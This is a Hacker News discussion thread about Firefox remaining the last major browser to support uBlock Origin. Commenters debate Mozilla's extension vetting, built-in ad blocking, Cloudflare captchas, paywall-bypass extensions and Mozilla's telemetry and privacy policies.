Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Firefox is now the last major browser that still supports uBlock Origin (pcworld.com)
1637 points by DemiGuru 1 day ago | hide | past | favorite | 626 comments
 help



Firefox is also the only browser that vets uBlock's code on every update to make sure the developer hasn't inserted spyware or malware into the extension.

They don't do it for every extension, but they do so for a wide selection of popular options.

> Recommended extensions differ from other extensions that are regularly reviewed by Firefox staff in that they are curated extensions that meet the highest standards of security, functionality and user experience. After receiving Recommended status, safety standards are maintained through automated checks, monitoring, and periodic technical reviews

https://support.mozilla.org/en-US/kb/recommended-extensions-...


Complete, authoritative list of Firefox extensions officially recommended by Mozilla.

https://addons.mozilla.org/en-US/firefox/search/?promoted=re...

Some quite informative discussion on Firefox subreddit when I discovered and posted the above list there a few months ago.

https://www.reddit.com/r/firefox/comments/1pyvx2v/complete_a...

The Recommended Extensions program description: https://support.mozilla.org/en-US/kb/recommended-extensions-...


Thanks. Just installed Consent-O-Matic. I avoided it earlier because I assumed it consented, but by default it does not consent.

Hrm... Maybe I should be using this instead of I don't care about cookies then, since that isn't recommended

I've had few sites that froze when using it coz it clicked something wrong ;/

Interesting they'd recommend Decentraleyes: its default configuration disabled all HTTP link prefetching, which hurts performance in a way not apparent from the extension description.

Decentraleyes has worse issues than that, it’s been mostly abandoned for 7 years and never covered much [1]. LocalCDN is better, but coverage is still insufficient, it still has no chance of actually preventing a CDN connection more than once in a blue moon. Modern privacy folks don’t recommend tools like this because they don’t really work and they do make your network and timing signature much more unique and fingerprintable.

[1]: https://git.synz.io/Synzvato/decentraleyes/-/tree/master/res...


You should have prefetching off by default tbh

Why?

I seem to remember TamperMonkey being on there but not ViolentMonkey, which I didn't agree with. However, I see neither of them on there. Both are available but not recommended. I wonder what is going on with that.

I suspect they no longer recommend either because either can download/execute scripts that Mozilla can't review, and the recommended extensions are reviewed, so they don't want to give users the wrong impression.

I could be wrong, however.


Probably just resources. Mozilla has to vet each update to give them the "recommended" badge and so they probably focus on the most popular extensions

They should have vetted ViolentMonkey instead of TamperMonkey the last time around.

> Tampermonkey - Rating 4.7 (5,306 reviews) - 760,294 Users

> Violentmonkey - Rating 4.7 (793 reviews) - 164,622 Users

On Google Web Store, it's 11,000,000 users VS 900,000 users.

Their popularity seems different by a magnitude, hardly surprising Firefox/Mozilla would chose to focus on one above the other.


I see GP's point tho. The original Greacemonkey was open-sourced. Tampermonkey was the successor and is proprietary. Violentmonkey came to fix that. I wouldn't be surprised if Mozilla rejected TM because of not being OS and rejected VM because of lack of popularity

I get what you mean, and it'd be cool if "Recommended" was only for FOSS, but I don't think that ever been the case? Probably lots of the "Recommended" extensions are proprietary, from https://addons.mozilla.org/en-US/firefox/search/?promoted=re... you don't get far before hitting one, the 3rd extension already is proprietary out of those, surely more.

FireMonkey is the one to use. Not verified, but that doesn't matter.

That's pretty cool. Thanks for pointing that out. I don't see where it says 'on every update' unless you're referring to the automated checks?

I've always wished extensions had more granular permissions though (a la phones, but more so). I think automated ai security checks sound promising soon.


Automated checks are done for every extension on every update. But their recommend extensions they feature on the Extension store, they do other extensive checks for each update.

what permissions do you suggest?

I'd like a way to easily specify exactly what sites an extension can run on. There are extensions that I'd like to run on a subset - often just one or two sites - without giving them access do anything else. For that matter, a way to only activate an extension as a one-off when I click it and on no other tabs.

What about container specific permissions? If they implemented that it would be enough for me since I tend to split up my services by type (eg: shopping, banking, work, hack) so enabling an extensive on a specific set of containers would rock. Right now I think the only control we have is over private tabs/windows?

I'm using an extension that does exactly that¹, actually every update of the extension is mostly about then supporting more websites and asking permission to access those.

So maybe more developers could do a all sites and manually select sites option?

¹BPC extension


The extension can declare which websites it can access, but the other commenter was looking for the ability for the user to declare which websites it can access.

> Firefox is also the only browser that vets uBlock's code on every update to make sure the developer hasn't inserted spyware or malware into the extension.

They could save themselves the trouble if Firefox simply baked in its own ad-blocking, but since Google basically owns them, we all know that will never happen.

Ladybird browser is going to be awesome.


Websites already can barely be assed to care about supporting Firefox users, doing adblocking by default is a great way to get websites to start putting up banners that say "our website does not work with your browser, please switch to Chrome" en-masse.

And Mozilla did develop anti-fingerprinting tech, but they can't enable it by default because it breaks lots of websites and when a website doesn't work they're not going to appreciate Mozilla for protecting them, they're going to be pissed that it doesn't work.


> banners that say "our website does not work with your browser, please switch to Chrome"

Which in practice means "switch to using a Firefox extension which fakes looking like Chrome, and just to selected shitty sites like ours".


Which in practice would only be executed by the same crowd of people who would have opted-in to the security features on the first pass.

Which in turn should be built into the browser and done automatically

I don't think Firefox should automatically spoof a Chrome user agent.

There's a long tradition of browsers doing exactly that.

The Chrome user agent starts with Mozilla/5.0, ends with Safari, claims to be like Gecko, based on KHTML, and somewhere in there is the string Chrome.

That was done exactly because people were trying to gate which browsers could or couldn't see their page by name, instead of by missing functionality.


If a site doesn't work, I disagree. It should.

The web is becoming a monopoly anyway... a contradiction to what web once meant.


In practice, it'd probably look like switching to chrome for the majority of users. A lot of tech saavy users would install a plugin but that's a lot of friction especially for random sites or even for an important site. Using chrome or edge would be easier for most users.

> start putting up banners that say "our website does not work with your browser, please switch to Chrome"

That's how IE 6 was killed.


The final death of IE6 was because corporates finally stopped using it⁰ and the reason for that had nothing to do with sites/apps refusing to work. If we'd said "we don't support IE6" they'd either say "the contract we signed years ago somehow says otherwise" or "fair enough, we'll use someone else's solution then".

What killed it was IE6 not supporting TLS1.0 out of the box or TLS1.1+ at all, and that started to make them fail external audits. After years of telling them IE6 was holding us back implementing best-practise security on their instances of our apps¹ and being ignored because doing anything about it their side was too much hassle, external auditors started refusing to give them relevant certificates & such because of their systems not being up to best practise (or even good practise by that point!) and suddenly they made the effort to no longer have anyone in their orgs using IE6.

--------

[0] source: I was working on software serving the banking industry (customer facing & investment sides, not trading) around that time and years either side

[1] Even having annual conversations like:

    ! The pen test results say you should disable anything below TLS1.0 (and later 1.1), and you haven't. Please do. 
    ? Are you sure? We'd *really* like to, as we've repeatedly mentioned, but that will block your IE6 users.
    ! Yes! You must follow the recommendations!
    ? Excellent. Done.
    [a short time passes]
    ! Your application is broken for some of our users!
    ? Yep. They are using IE6 without TLS enabled. 
    ? Either you need to upgrade their configurations or tell us, in writing please, to break from best practise and reenable the older protocols.
    [another short time later]
    ! Please reenable the older protocols.

I'd like to think this conspiracy at least contributed: https://blog.chriszacharias.com/a-conspiracy-to-kill-ie6

Unless it's all fud in which case I shall archive this under headcanon.


Oh that certainly did the trick for home users, but I was having to deal with IE6 for our clients (at least one of them was IE6 only), as were people I knew working in or otherwise supporting other corporate environments, for several years after that.

Some management types might have even seen YouTube potentially blocking IE6 users as an advantage for keeping with IE6 to save bandwidth on their creaking external network links!


It was killed by a lawsuit, mostly.

Also FE devs using all new Chrome shinny APIs, and their Electron junk are also to blame, and they aren't going to throw their toys away.


If nothing else, I really do hope that the greater AI usage leads to more adoption (and hopefully interest) of native frameworks.

If only, everyone brags about Claude and Fable, yet they can't do anything better than Electron and React for TUIs.

Brave has native ad-block and anti finger-printing, enabled by default, and the web works excellently as in I don't know of a single site that doesn't work with it.

Brave is based on Chromium and inherits basically all compability, that this brings.

Firefox with Gecko is a different engine entirely and that sometimes causes compatibility issues or different behaviour, that websites have to account for.


Brave's ad block is pretty ineffectual by itself. For example it doesn't block youtube adverts. Recently switched to Firefox with Ublock origin, and loving it. So much more efficient and quick than it was back in the day when we all switched to Chrome.

For example it doesn't block youtube adverts

Pretty sure that's not true. I don't see any YT adverts when using Brave, and I don't have any extensions installed.


It definitely blocks YouTube ads.

I don't know what to tell you... It most definitely does not block youtube adverts for me and never had / did... Also, I found Ublock origin updates less reliable / frequent on Brave. Since switching zero issues.

Perhaps you were disabling their adblocker by trying to use ublock? In general there's no reason for additional plugins - they also have native custom filters, scriptlets, and so on.

“For me” seems to be the keyword here. From what I know it works for most Brave users.

My Brave installation blocks YouTube ads on iPhone and Mac. Every few weeks there is a day where the ads show but the next day they are gone again.

I never see YouTube ads since switching to Brave.

Not saying your wrong, but the number, and type, of sites you browse is going to be a very narrow slice of the sites that all Firefox users browse

Websites blocking Firefox because of ad blocking has happened before:

https://web.archive.org/web/20070817224229/http://whyfirefox...


Very, very easily defeated by a user agent switcher.

Snapchat tries to block Firefox, but all you have to do is fuzz the agent to say you're Chrome and then you're in with no issues.


With a normal Firefox on desktop on Linux, I get unsolvable recaptchas all the time, especially on cloudflare pages.

Ironically, if I fake instead a chromium to be on Windows (UA and Sec-CH headers), I am allowed most of the time even though my TCP fingerprint must mismatch then.

It's annoying to see what the normal web has become. Can't even read news anymore.

Ironically, all these bot defenses make it easier for bots to scrape their website, but make it harder for actual users to use them.

The only bot defense web app firewall that still works with Firefox seems to be Anubis. Pretty much all others autoflag Linux users as bot users, which feels insane if you think about less web developers must know about how botnets work.


> With a normal Firefox on desktop on Linux, I get unsolvable recaptchas all the time, especially on cloudflare pages.

I get this with Chrome on MacOS.

I'm becoming more convinced that Cloudflare is the bane of the internet.


> I get unsolvable recaptchas all the time, especially on cloudflare pages.

If you really mean reCAPTCHA (the one with a “select all squares that have X” kinda challenges), then Cloudflare hasn’t used that for quite a while now. archive.today uses a Cloudflare-looking (old style) page with a reCAPTCHA (and they do serve it quite often), but I don’t think I’ve seen other sites do that.


No you can get literally unsolveable captchas with cloudflare. You tick the box and it just refreshes and displays the unticked box again. Or people it on gateway endpoints that just return plain text errors (Humble does this).

There's code that makes it do something different after 100+ failed retries but you can speed it up by editing the _cf_chl_rc_* cookie (which is just a number). I haven't yet worked out what it does differently.

With Firefox on my windows computer I never get unsolvable recaptchas or have any issues with Cloudflare.

> I get unsolvable recaptchas all the time, especially on cloudflare pages

Repeated problems with cf and similar like this seem to be more common for users behind CGNAT (most mobile users for example). Presumably all the other hosts sharing the same final outgoing address(es), some of which will be running bots either deliberately or because they've been infiltrated by malware, confuse the heuristics that decide how often checks should be made.


we have clause in deal with clients about browser support (IIRC 5% or something like that). FF was just mismanaged so badly that the usage dropped so far into low single digit % it's not the question of maliciously not supporting it, it's the question of not wasting time on browser barely anyone of actual users use.

So, most sites work, but are never tested on FF, because there is no point, client won't pay for it.


The level of mental gymnastics in this thread denying the extent to which companies like Google (and their puppets like Mozilla) control the internet is too damn high.

Fortunately if projects like Ladybird gain enough momentum, websites might be forced to cater to it. Time will tell.


You know you can make a browser based on Firefox's core and don't need to make a new one from scratch that'll never get past Cloudflare?

> You know you can make a browser based on Firefox's core

If you want to inherit all of Firefox's flaws, I suppose.

> and don't need to make a new one from scratch that'll never get past Cloudflare?

Considering Cloudflare is a sponsor of Ladybird, something tells me they're going to grant an exception for it.


Sadly Cloudflare's browser detector is the main barrier to using Servo for most websites, so they're not the angel they seem

What flaws exactly?

People on here love to moan about Firefox because Mozilla did one thing at some point in the existence of the company they didn't like. But then just cede the Internet to Google and chromium clones because at some point when they were a crappy junior JS dev, Chrome had some better tooling over Firebug so they just got used to testing in one browser. Maybe they also like to remember how Firefox, a decade ago, couldn't handle 1000 tab sessions.

I hope Firefox keeps up the fight but HN loves to crap all over them for not being perfect.


"What flaws exactly?"

Considering Mozilla proclaims it's pursuing "user privacy" as a goal, there is an unreasonable amount of "phoning home" enabled by default in Firefox

This default behaviour, constantly try to ping mothership servers by default, also seen in Chrome, is contradictory to the notion of user privacy

Firefox allows a determined user to reconfigure most of this data collection. But why a user should have to do this is reasonable cause for skepticism about Mozilla's true priorities

Firefox sends www search data to Google by default. For a supposedly "private" browser, that is a fatal design flaw. There is no way to paint over this but that's exactly what Mozilla purports to do. This makes Mozilla look farcical despite the relative utility of Firefox, even with its flaws

I'm biased as a user of a 1.4MB customised, statically-compiled text-only browser. I probably have different standards than graphical browser users. For example, I don't use Firefox for making HTTP requests. It makes too many gratuitous ones that require too much effort to control. IMO


> What flaws exactly?

For starters, they notoriously make configuration a difficult and shifting game of whac-o-mole to do simple things such as disabling the AI that nobody asked for:

https://news.ycombinator.com/item?id=45926779

It's also become more unstable in recent years, and I'm not even talking about 1000 tab sessions. It will crash with only a handful of tabs fairly regularly on linux.

For more flaws, look at everything LibreWolf, Waterfox, etc do to make up for them.


I don't think the AI is part of the core. You know you get to change all that stuff when you make a fork, right?

But you would still be left with all of the other issues pointed out by me and others. Plus, the parent seemed to be referring to FF, not just its core, so I replied accordingly.

> What flaws exactly?

It's not modular, for example. You can't just use the Gecko engine in your project. To do so, you have to deal and hack through the whole codebase of the Firefox browser.


Well for years HN was complaining that Mozilla was trying to fix that, because it broke XUL extensions.

It's been many years since Firefox dropped support for XUL extensions and XUL itself. It even lead to Firefox being forked, and Palemoon browser (amongst other forks of it) now carry the legacy of XUL ( https://udn.realityripple.com/ ). Also, that hasn't stopped Firefox from offering stand alone Gecko on Android ( https://mozilla.github.io/geckoview/ ) now, has it? If they can do it for Android, why not all the other desktop platforms? Start redirecting the 300+ million dollars they have earned from Firefox to the developers instead of the CEO et al and maybe we will see some good innovation happening in Firefox ...

People complain about Chrome as often as about psychopaths, because it can't be fixed.

> What flaws exactly?

Look how few people use it. Do you still want to claim that firefox is perfect? Because if not I suggest to read up on the last 15 years why people stopped using Firefox. Not all of which has to do with Google.

> I hope Firefox keeps up the fight but HN loves to crap all over them for not being perfect.

This shows a total lack of understanding. You assume that Firefox is perfect. It is not. It is a pretty bad browser. There is a reason why adChromium won. I wish it would be different but it is not.


Can’t speak for all users, but at least as of about six months ago, there appears to be a bug in Firefox in NixOS where the shader cache doesn’t appear to be able to write properly, and as such video acceleration doesn’t work. It became most evident when I was trying to watch 360-degree videos in Immich.

Entirely possible that this is an issue specific to NixOS or my machine, but because of that issue I switched over to Brave.

I would like to go back to Firefox at some point. Maybe I’ll see if I can make a patch to fix video acceleration on NixOS.


the obvious thing to do is keep using firefox as your daily driver, and load up the other browser as needed for the video etc.

I'm being tongue-in-cheek here because it seems most people just give up on safari/firefox if one thing doesn't work and go to some chromium-based browser as their default driver. That's sad.


I don't understand it. I do keep an ungoogled chromium install around for the few times when I suspect a site is intentionally breaking itself for firefox, and it's not a big deal to open on occasion. Otherwise, if you value customization at all, you have to use firefox.

I am not going to use two separate browsers purely so that a larger percentage of my time is spent in Firefox. That’s not a solution; the solution is to fix Firefox.

I would rather spend 100% of my time in Firefox but that’s not doable right now.


What you say is what I do, Firefox is open all the time, I switch to brave or edge if ff won't load something. I use adnauseam as adblocker.

I have never had chrome on windows 10 or 11; nor chromium.

For a year chase.com wouldn't allow me to login from Firefox. Dumb.


Did you go to your local Chase branch with Firefox on your phone and pretend you have no idea why it doesn't work?

Thats what I do - that 1 page in 100, if at all, goes to chrome. But basically 100% of pages I ever use work fine.

They will have to pry with significant force firefox with ublock origin from my old dusty finger bones... fuck the rest for selling us all out.

Even if it won't move the needle a bit, I can look at myself in the mirror in this specific regard and be content that I didnt bow my head like bland masses did and didnt work towards massive enshittification of our global society from now on.

Because thats what its all about, nothing less. With our choices, we shape future for our kids and grandkids. Shame on you, all you rich faangs who are directly helping this. Godwin's law is never too far in such cases and history wont be kind to you, no reason to be


Aw man, one issue you don't even know is Firefox's fault?

Regardless of whose fault it is, it still makes the browser unusable for me.

> You know you can make a browser based on Firefox's core and don't need to make a new one from scratch that'll never get past Cloudflare?

Under some definitions, the browser IS the core. You are bound at a fundamental level to your parent if you build on someone else's foundations. Firefox is probably a great one to do it but worth knowing that someone else owns the land upon which you stand.


They literally didn't deny that. They made a separate point you appear not to have actually read.

Regardless, I don't want baked-in Firefox adblocking in part because I don't trust Mozilla with that task either. They'd absolutely end up allowing their own "acceptable" telemetry and ads. Even if they didn't, it would be unlikely to ever be as effective as Ublock Origin. Much like how Chromium browsers' built-in adblocking is barely anything in comparison, even on Manifest V2.

And yet, for now, Firefox and Mozilla is by far the lesser evil. I like a few of the Chromium browsers well enough, but they are ultimately at the mercy of Google.

I hope Ladybird does well, too.


Their separate point was ignored because it was an irrelevant tangent.

> Regardless, I don't want baked-in Firefox adblocking in part because I don't trust Mozilla with that task either.

This is in a thread about how we should be happy that FF is vetting code for us. Do we trust them or don't we?

> And yet, for now, Firefox and Mozilla is by far the lesser evil.

I'm instinctively tempted to agree, but the difference is so negligible at this point that the only sign I would is the fact I'm still using FF due to momentum (as well as Ladybird not being ready from prime time yet).

FF/Mozilla has proven itself to be controlled opposition, so I'm not very interested in games of "lesser-of-two-evils" abuser logic that has infected politics and many other spheres in a race to the bottom.


> Do we trust them or don't we?

GP trusts them for reviewing external extension code, and ensure that it does not contain malware, but not for not inserting exception to their own telemetry if they wrote the code themselves.

Or, more likely, they feel that having two independent actors collaborating on the extension (one by writing and the other by reviewing) yields a more trustworthy outcome than either actor on their own.


That was a rhetorical question.

Mozilla have given us plenty of reasons to not trust them, which makes it hilarious that anybody would think it's noteworthy they're reviewing the code of Raymond Hill of all people.


We could tell it was rhetorical, to imply the position was ridiculous. But when accepting nuance there is a real answer.

> Raymond Hill of all people.

As good as he's been, he's still just one person with a hobby project. Yes please review it!

And what if he gets hacked?


>> Regardless, I don't want baked-in Firefox adblocking in part because I don't trust Mozilla with that task either.

> This is in a thread about how we should be happy that FF is vetting code for us. Do we trust them or don't we?

Are you joking? You brought the claim to the table, and now that people see the flaws in it you deny them talking about it? You're some mental gymnast..


Looks like you took a rhetorical question literally. See my other comments if you're confused.

I saw your other comments, and you might be the one who is confused.

Very convincing argument you have there.

Just used your style to defeat you. Easy mode

You've yet to say anything of substance. Why are you even on HN?

More substance than you

> Fortunately if projects like Ladybird gain enough momentum, websites might be forced to cater to it. Time will tell.

Ladybird has corporate sponsors too. Sponsorship is influence. Obviously, the more sponsorships you have the less influence an individual one have but it is worth knowing.


That's like suggesting that someone using LLMs to assist coding, could save themselves the trouble by writing the code by hand.

Yes, Firefox could do everything, but then it'd turn back into Mozilla. The whole point of the extensions framework is to allow modular extensibility. And it's much easier to vet for malware than to code afresh and maintain.

What stuns me is that most people still use browsers that cannot block ads, seem genuinely annoyed by ads, but don't want to even try switching to a browser that will easily block those ads. It's amazing how much crap people are willing to wade through when the alternative is trying something new.


> That's like suggesting that someone using LLMs to assist coding, could save themselves the trouble by writing the code by hand.

No it's not.

> Yes, Firefox could do everything, but then it'd turn back into Mozilla. The whole point of the extensions framework is to allow modular extensibility. And it's much easier to vet for malware than to code afresh and maintain.

No, quite the opposite. FF has a history of adopting extensions as baked-in functionality if they prove useful/popular enough. There are tons of examples of this from the past for various features, which is great.

But that fact makes it even more absurd that they refuse to do the same for what is likely their most popular extension of all time: uBlock Origin


Waterfox, a Firefox fork, has actually built a builtin qdblocker. (And yes, they do whitelist their search partner by default, but you can turn that off.) Apparently it’s faster than uBlock Origin, but there’s been problems on some websites, so I’ll be sticking with uBO for now.

Edit: actually, it seems the underlying functionality was built by Mozilla themselves, just not exposed in the UI yet: https://news.ycombinator.com/item?id=49309020


Not "everything", just a few common things that almost every user wants.

> Yes, Firefox could do everything, but then it'd turn back into Mozilla.

It's been 20+ years, nobody cares about that anymore.


Admiral and several other of the more obnoxious ad networks already claim that Firefox is an ad blocker simply because of its out-of-the-box blocking support for third-party cookies and those ad networks nag you to use another browser. If Firefox added actual ad blocking out of the box I can't imagine the havoc that would cause and how many more websites would claim that they don't work at all in Firefox.

A sharp point in this context because yet again, Mozilla faces contradictory demands in every direction. In today's edition, they are failing their users by not hard coding the ablocking in but also they need to give up on ad blocking because if they try they'll simply be blacklisted.

"Do X." versus "Don't do X." is a set of demands faced by most programs.

Firefox started shipping adblock-rust in March (Brave's built in adblocker). It's not properly wired up in the UI yet but you can enable it and add filter lists in about:config.

I am cynical about this move - this could be used by them to cripple support for uBlock Origin eventually, to keep Google happy.

>since Google basically owns them

Google has been trying to kill them since they moved the Chrome team into the same building as the now defunct SF office.

(Apparently they offered people a lot of money? There are some words I could use to describe people who do things they think are unethical for cash I'll leave unsaid.)


Can you share your source for this?

People believe ublock because it's reputable and not affiliated with browsers IMO.

If Firefox baked in ad blocking, they would have to then deal with the financial incentive to make it worse. Sponsored ads, 'good' ads, government announcements, election propaganda... there is a slippery slope they are better off not getting on. A trusted 3rd party from the wider community seems a better option in many ways. The alternative is starting a web browser with a manifesto welded on that essentially states 'death to all advertising', and until that can be crowd funded I can't see that happening in today's world.

What I am surprised about is that none of the browsers or forks have created a specialist plugin API for adblocking and maybe other filtering. Provide what is needed and only that (keeping the surface tiny), and then evolve the general purpose API in the way they need. I don't think we need V2 of the API any more, except for keeping this one absolutely critical plugin working, do we?


Both the Brave browser, and Vivaldi browser have some kind of built-in adblocking API. The makers of Brave browser even pay some of the adblocking list curators.

Firefox has baked in adblocking (using adblock-rust, brave's built in adblocker), but it has to be enabled through about:config and not the settings UI.

In one of the monthly update videos Andreas mentioned that although they are working on a basic built-in adblocker for Ladybird, long-term they want extension support and the adblocking functionality to be in an extension.

Why does ad blocking always have to be relegated to an extension? Browsers build in so many things. Why do they all draw the line at a feature like ad blocking that every user wants?

Because modular architectures are good? I don't know what to say here. Even if it was built in it should be a built-in extension.

Because they want a level of plausible deniability.

The way uBO works already provides a layer of plausible deniability. It's just a content blocker that loads filter lists maintained by other people.

I'm not sure if you responded to the wrong comment, but the gpp was suggesting building it in by default.

If Firefox included it by default then it would remove a layer of deniability.


What do they need to deny? Ad blocking is clearly a feature many users want. It’s often the only extension people install. If I were Firefox, I’d build it right into the core of the engine. Turn it on with a checkbox and/or custom blocklist sources.

google money could dry up right quick. extension route gives them some deniability.

Yes, I meant building it in by default won't remove any deniability, because it will just be a content blocker where users can load their own filters (with maybe some adblocking filters suggested by default).

See, this is the kind of thing that makes Firefox cool. They have not only just as good of developer console tools as Chrome, they have forward thinking, truly user-oriented policies. They have had trouble in the recent past at securing funding, but something tells me their user philosophy might save them when all the others turn completely to corporate greed as their main operating mechanism (if they already haven't).

Your reply makes no sense. To the original point, if they had user-oriented policies, they'd have ad-blocking baked in by now. But they don't, and likely never will.

> Your reply makes no sense. To the original point, if they had user-oriented policies, they'd have ad-blocking baked in by now.

It's not black and white, and your inability to see the larger context is disturbing.

You could, by the same logic, criticize Mozilla for not serving you coffee which is certainly a "user-oriented policy" "baked-in" or rather "brewed-in". But we must be realistic about how far UOPs can be stretched, Mozilla is better than the rest, which includes large corps with far more money than them. If you can do better than Mozilla, I'm all ears.

Next, an ad-blocker needs continuous maintenance - someone started a good one long time ago and apparently loves to improve it and maintain the various lists it uses - why should Mozilla strain to compete with one of their best contributors? - that would be both rude and dumb, and they'd be wasting resources too. There's absolutely no upside to your proposition but you keep insisting.


> Next, an ad-blocker needs continuous maintenance - someone started a good one long time ago and apparently loves to improve it and maintain the various lists it uses - why should Mozilla strain to compete with one of their best contributors? - that would be both rude and dumb, and they'd be wasting resources too. There's absolutely no upside to your proposition but you keep insisting.

One would hope that's one of the more useful things an LLM could assist with if not now, very soon. In the meantime, there's no reason they couldn't have uBlock kept as an extension but bundled by default like they've done with other functionality over the years. Wait, never mind. There's one rea$on why they wouldn't, and it's already been $tated.


You're absolutely right.

[flagged]


"RIP Charlie Kirk

I hope many more debate nerds carry on his quest to engage young people with words, not fists."

If this statement - a urge to engage in peaceful debate, not violence - makes you hate him, then I see the problem rather with you. I mean seriously, do you like civil war? Because this is what happens when people don't talk anymore about their disagreements, but physically fight.



Mildly funny, but not sure what your point is here?

The problem is that it's urging you to use words against people who are using fists. That is, it's urging you to self-sabotage and lose.

It's quite possible the statement was written by a naive person who doesn't realise this. Lots of people don't realise this.


Hm. Charlie Kirk was not urging people to use fists as far as I know.

I didn't know who Charlie Kirk was, and no facts about DHH other than him being Rails creator.

"will never be awesome" is missing some quantifier about US-centricity.


> US-centricity

Andreas Kling is Swedish, DHH is Danish, fascism originated in Europe.


Italian fascism originated in Italy, but if you broaden the definition of "fascism" to include Nazism (as Adolf Hitler did), then there's an argument that it originated in the 19th century, in many parts of the world, including the United States. Among others, Adolf Hitler took inspiration from Madison Grant, Henry Ford, and the Jim Crow laws; and the Nazi regime took inspiration from Harry Laughlin, the KKK, and American eugenics. (WWII might be a bigger contributor to eugenics going out of fashion in the US than its lack of scientific merit was.)

Yikes, that is a twist I was not aware of.

I don't see how someones personal politics could dictate the "awesomeness" of there software.

Considering enough developer on this very site "stan" Charlie Kirks assassin and other people that are violent towards anybody less left wing than them: "your boos mean nothing, i have seen for what you cheer"


Exactly, the German autobahn is also awesome. /s

After watching them butcher their own side tabs implementation, I don't know if we really want that, unless they're actually hiring the uBO team directly.

Good for them! Glad they have the resources to do so. The free Brave Origin on Linux also has good native ad-blocking in my experience.

I kept Firefox on one system for testing and had some non-popular extensions installed there. I rarely opened it and when I did it would spew me with a message that one of the extensions got malicious code installed

I’m a huge fan of Mozilla and Firefox specifically, but I don’t think that the way classical adblock extensions are made is the right way. Instead, it should be done as Apple/Safari do it [1]: the browser provides an API to hook/set a block list of identifiers that should be blocked, it could be resource hostnames, html signatures, need to think how to improve the API, but this way it’s completely safe, extension has zero access to the actual page content. Apple does the same for caller id apps. Afaik, Android has this API too, but the last time I checked, all relevant extensions were just “give me your whole phone control or web page access”, so Google clearly doesn’t enforce it

Yes, it kinda gives more control to the platform, but so far, iOS extensions that use this API worked surprisingly well for me

Please, correct me if I am wrong and uBclock can already work in this restricted mode

And the last thing, if people really want to give someone a full page content access, they surely should be able to do that, so kudos to Mozilla

[1] https://developer.apple.com/documentation/safariservices/cre...


Absolutely not. This is exactly why people have a problem with Chromium, which now has some of the same restrictions on extensions as Safari (Manifest V3).

- uBlock Origin works best on Firefox: https://github.com/gorhill/uBlock/wiki/uBlock-Origin-works-b...

- uBlock Origin Lite FAQ: https://github.com/uBlockOrigin/uBOL-home/wiki/Frequently-as...


One of my biggest annoyances about my iPad is how much less effective the content blockers on Safari are than on real Firefox and ublock origin that I have on my Android phone and had on my previous windows tablet. Also iOS “Firefox” can’t run any adblockers, whether ublock origin or iOS content blockers so I have to use Safari and put up without consent-o-matic or tab sync

For example, ublock origin is able to patch out anti-adblock scripts that Safari content blockers cannot. Try tvtropes for an example. Works fine with firefox and ublock origin, displays a “allow ads of subscribe” instead of the content on safari.


Kagi's Orion browser is a far as I know the only one on iOS that supports proper Firefox extensions, including ublock and others. You may want to give that a try.

There is no real support for uBlock Origin on Orion - it's still very buggy and doesn't work. They do have their own adblocking built-in though.

You might want to try wblock (https://github.com/0xCUB3/wBlock).

You can only get a very limited uBlock Origin facsimile, not the real thing. A lot of browsers have a uBlock Lite. It's missing a lot of useful features IMO.

I think that would limit its capabilities so much that it would be much easier for ad platforms to find ways to circumvent it.

So you want to make it super easy to bypass the block by randomising identifiers every so often, and then the blocker will have to go through the full update process?

Maybe this works for some extensions but an ad blocker has to be maximally dynamic to work.


With that approach how am I going to block ads on long-tail-site.example.com and lots-of-ads.new-domain.com? I'll let uBO read my traffic. Firefox is reading my traffic anyway.

Also for youtube download plug-ins. yt-dpl does not work for youtube anymore.

Still works for me. The occasional 403 has always been an issue

I recommend two more:

1. pass paywalls clean.

2. Social Fixer


Rather than introducing additional attack surface and privacy risks with yet another extension you can just use archive.is/archive.ph instead of Bypass Paywalls Clean.

Or, just pay for journalism since it’s not free to do.


You mean Bypass Paywalls Clean? It's illegal and it's not even on the Firefox extension store. You have to download it from some Russian Github alternative and manually install it.

I will say however, it works remarkably well. I haven't seen a paywall in years!


Why should it be illegal?

I don't think it should but it was taken down from Firefox's store because of a DMCA copyright takedown. Firefox was required by law to remove it. Using the extension itself is a legal grey area, but distributing it is usually illegal.

> because of a DMCA

That law doesn't apply to many HN readers


It does apply to Mozilla, and some version of it applies to every country that trades with the USA (because the USA makes all trade deals contingent on it)

Exactly. And I don't think there's many Cuban, Iranian, and Yemeni people on HN

It’s not illegal. But it’s a step too far for some.

It's unquestionably illegal to distribute. As in, if Mozilla (or anyone else hit by the DMCA) were to add it back to the store, they would be acting illegally.

It's not. Op is wrong

It's been taken down by DMCA copyright strikes on every western platform that could distribute it. That's why you can't find it on the Firefox extension store anymore

None of that means it’s “illegal”. You apparently think something being removed to reduce legal risk means it’s illegal, but that doesn’t follow.

It's illegal to distribute. Unambiguously. That's how DMCA works. If Mozilla were to add it back to the store, they would be acting illegally.

[flagged]


I don't like telemetry being defaulted to opt-in but relax. It's anonymized and it's far and away the least intrusive of the major browsers

It's not anonymized, because your communication with Mozilla has plenty of identifying information.

Also, Mozilla officially un-committed to not using sell this and any other data it collects from you:

https://arstechnica.com/tech-policy/2025/02/firefox-deletes-...


I'll repost my comment from elsewhere:

> They rewrote the terms almost immediately after the backlash. They also claimed the original terms were written in response to the overly broad legal definitions of "data sales" under laws like the CCPA. Which tbh sounds reasonable


That article is well over a year old. The current privacy FAQ right now explicitly states:

> We never sell your personal data. Unlike other big tech companies that collect and profit off your personal information, we’re built with privacy as the default. We don’t know your age, gender, precise location, or other information Big Tech collects and profits from.

https://www.mozilla.org/en-US/privacy/faq/


They pulled back on the websife change after backlash, but trust takes a long time to rebuild.

Also, don't go by the FAQ. Go by the actual terms and conditions.

Remember part of their original response to the controversy was to say "we don't sell your data, we just give it out in exchange for money" so I'm inclined to ignore anything from them that says "we don't sell" as they clearly don't know what it means.


The trust was lost because of the public's misunderstanding of the change. It was updated as a response to the overly broad legal definitions of "data sales" under laws like the CCPA. As your own link says, Mozilla explicitly stated:

> It does NOT give us ownership of your data or a right to use it for anything other than what is described in the Privacy Notice.


Went to that FAQ again, and it contains false claims. They say:

> we’re built with privacy as the default.

Which is not the case, they are built with monitoring, calling-home and transmission of quite a bit of telemetry as the default.

> We don’t know your age, gender, precise location, or other information Big Tech collects and profits from.

They know my imprecise location by default, since they have their browser send my IP to them. I don't know whether the host of other information affords a statistical determination of age or gender; but the supposed "non-personal data" they collect, when correlated with data available to other companies like Alphabet, may well allow determining age and gender or even full personal identification.

> We never sell your personal data.

It doesn't say we never sell your data, period.

It doesn't say we never sell the results of processing your personal data.

